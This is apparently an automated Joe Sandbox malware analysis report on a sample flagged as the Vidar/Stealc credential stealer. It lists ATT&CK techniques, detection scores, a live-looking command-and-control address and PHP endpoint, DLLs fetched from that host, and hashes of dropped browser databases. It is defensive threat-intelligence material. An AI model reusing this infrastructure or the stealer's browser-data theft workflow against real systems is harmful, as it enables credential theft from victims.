Source: Yara match	File source: 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	37%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.100/	100%	URL Reputation	malware
http://185.215.113.100/e2b1563c6670f193.php	100%	URL Reputation	malware
http://185.215.113.100	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	URL Reputation	safe
http://185.215.113.100/e2b1563c6670f193.phpH;	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.php=Iq	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phph	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpion:	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/msvcp140.dllK	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpBrowser	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/vcruntime140.dll	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpm	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpp	100%	Avira URL Cloud	malware
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://185.215.113.100/e2b1563c6670f193.phpf	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/mozglue.dll	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpndI	100%	Avira URL Cloud	malware
http://185.215.113.100Z	0%	Avira URL Cloud	safe
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
http://185.215.113.100/0d60be0de163924d/softokn3.dll	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.php:	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/sqlite3.dll	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/nss3.dllc	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.php(	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/freebl3.dll	100%	Avira URL Cloud	malware
http://185.215.113.100e2b1563c6670f193.phpion:	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://185.215.113.100/0d60be0de163924d/nss3.dll	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/vcruntime140.dlll5	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.php0	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/vcruntime140.dllN	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/msvcp140.dll	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.php$	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.php3	100%	Avira URL Cloud	malware
185.215.113.100/e2b1563c6670f193.php	100%	Avira URL Cloud	malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	0%	Avira URL Cloud	safe
http://185.215.113.100/0d60be0de163924d/msvcp140.dll)	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpLo	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.100/0d60be0de163924d/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/	true	URL Reputation: malware	unknown
http://185.215.113.100/0d60be0de163924d/mozglue.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.100/0d60be0de163924d/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/0d60be0de163924d/sqlite3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/0d60be0de163924d/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/0d60be0de163924d/nss3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/0d60be0de163924d/msvcp140.dll	true	Avira URL Cloud: malware	unknown
185.215.113.100/e2b1563c6670f193.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	AKFIDHDG.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/e2b1563c6670f193.phph	file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/e2b1563c6670f193.phpion:	file.exe, 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpm	file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpBrowser	file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpH;	file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpp	file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/0d60be0de163924d/msvcp140.dllK	file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.php=Iq	file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	EGCFIDAFBFBAKFHJEGIJ.0.dr	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/e2b1563c6670f193.phpf	file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpndI	file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100	file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmp	true	URL Reputation: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/e2b1563c6670f193.php:	file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100Z	file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.100/0d60be0de163924d/nss3.dllc	file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2294260699.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.100/e2b1563c6670f193.php(	file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	AKFIDHDG.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.100/e2b1563c6670f193.php3	file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.php0	file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/0d60be0de163924d/vcruntime140.dllN	file.exe, 00000000.00000002.2284021788.0000000029A84000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/0d60be0de163924d/vcruntime140.dlll5	file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.php$	file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100e2b1563c6670f193.phpion:	file.exe, 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	AKFIDHDG.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.100/0d60be0de163924d/msvcp140.dll)	file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.mozilla.org	AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/e2b1563c6670f193.phpLo	file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	AKFIDHDG.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.100	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501501
Start date and time:	2024-08-30 00:47:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 79 Number of non-executed functions: 114
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.100	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	Z66MsXpleT.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	eSLlhErJ0q.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AEBKKECB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBKKECBGIIJJKECGIJECGDHIE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFBAFBKEGCFBGCBFIDAKEHDAFC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKFIDHDG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGCFIDAFBFBAKFHJEGIJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Reputation:	moderate, very likely benign file
